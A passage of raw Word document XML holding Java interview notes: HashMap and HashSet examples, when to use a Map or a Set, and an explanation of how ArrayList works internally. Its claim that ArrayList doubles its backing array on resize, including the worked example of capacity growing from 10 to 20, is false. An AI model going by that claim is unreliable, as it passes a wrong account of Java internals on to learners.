            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B5E8ABB"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when you need to store unique items and don’t care about the order (e.g., storing a list of unique items).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A8FEB37" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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 with Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F5853" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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Map Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C3C98"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HashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D8843"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Map;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B011B53" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748226B3"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pExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4013A26E"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4C4B241C"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ing a HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B53151"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lt;String, String&gt; phoneBook = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731E6E3"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073730D"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dding key-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811725F"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honeBook.put("John", "12345");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D6647"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honeBook.put("Alice", "67890");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A297B5F"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46ED396"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Retrieving value using key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB806CC"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John's phone number: " + phoneBook.get("John"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E989C4"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A56ECE2"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3CA7B48" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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this example, each </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., "John") maps to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., "12345"). Keys are unique, but values can be repeated across different keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E8698D" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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Set Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04260B63"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HashSet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F7B2E"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Set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15755F9E" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E1E3F3"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etExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2B9EB"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00D341A5"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ing a HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389FF2E"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lt;String&gt; uniqueNames = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200F4FF2"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67AB9C1"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dding elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D34D57D"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uniqueNames.add("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEEF4F9"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uniqueNames.add("Alice");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1038E920"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uniqueNames.add("John");  // Duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72541CFB"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FE8B768"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nting the set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0CBC0"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Unique names: " + uniqueNames);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E255CB8"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A62BBC3" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B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8C9F52A" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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this example, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stores only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements. Even though we tried to add "John" twice, it will only appear once in the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF377C" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B6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to Use Map vs Set:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569040C0" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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a Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to associate </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys with values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., a phone book, where you associate names with phone numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710E222" w14:textId="77777777" w:rsidR="00A66040" w:rsidRPr="00CE4B95" w:rsidRDefault="00A66040" w:rsidP="00C46B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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a Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to store </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique items</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and you don’t care about the association with another value (e.g., storing a collection of unique emails or user IDs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24583475" w14:textId="45293FA7"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10A59F1">
          <v:rect id="_x0000_i1501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D610185" w14:textId="77777777" w:rsidR="003D1380" w:rsidRPr="00CE4B95" w:rsidRDefault="003D1380">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc196307637"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Explain internal working of ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w14:paraId="09ACDEE8" w14:textId="3C66EBE5" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">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in Java is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it is implemented as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>resizable array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is one of the most commonly used classes in Java for storing elements. Understanding its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>internal working</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help you better manage performance and memory when using ArrayList in your programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F01C1C" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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ternal Working of ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61732FFE" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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ere’s a breakdown of how an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works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B050A9A" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Backing Array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B747BEE" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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is backed by an internal </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. When an ArrayList is created, the internal array is initialized to a default capacity (10 elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC325F7" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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is array holds the elements of the ArrayList. When the size of the ArrayList exceeds the capacity of this array, the array is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reallocated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a larger size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9439AB" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Dynamic Resizing (Growth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44750CCB" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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elements are added to the ArrayList, the size of the internal array increases </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978A003" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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the internal array is full (i.e., its capacity is reached), a new array is created with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and all the elements from the old array are copied to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F6BE2" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Growth Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA79F2" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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default behavior for resizing is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>double</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the size of the internal array when the current array becomes full. This helps in minimizing the number of resizing operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524FF46" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Size and Capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3761E969" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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apacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the number of elements the ArrayList can hold before it needs to resize.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424437D6" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the number of elements that are actually in the ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EECA6" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13698954" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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itially, the ArrayList may have a capacity of 10, but if 15 elements are added, the capacity will automatically increase to 20 (by doubling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C61A01" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Adding Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E084F0" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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an element is added using add(E e), it is placed at the next available index in the backing array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0458A63C" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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f the array is full</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a new array with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>twice the capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is created, and the elements are copied over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE045E" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Accessing Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A694E" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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ing elements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in an ArrayList is very efficient because it provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the elements via the index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3316C967" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75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ime Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for accessing an element at a specific index is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constant time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3935C2" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="0061732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Removing Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D015F1" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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an element is removed from the ArrayList, the elements after the removed element are shifted left to fill the gap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE67673" w14:textId="77777777" w:rsidR="00E9327D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E9327D" w:rsidP="00617329">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ime Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
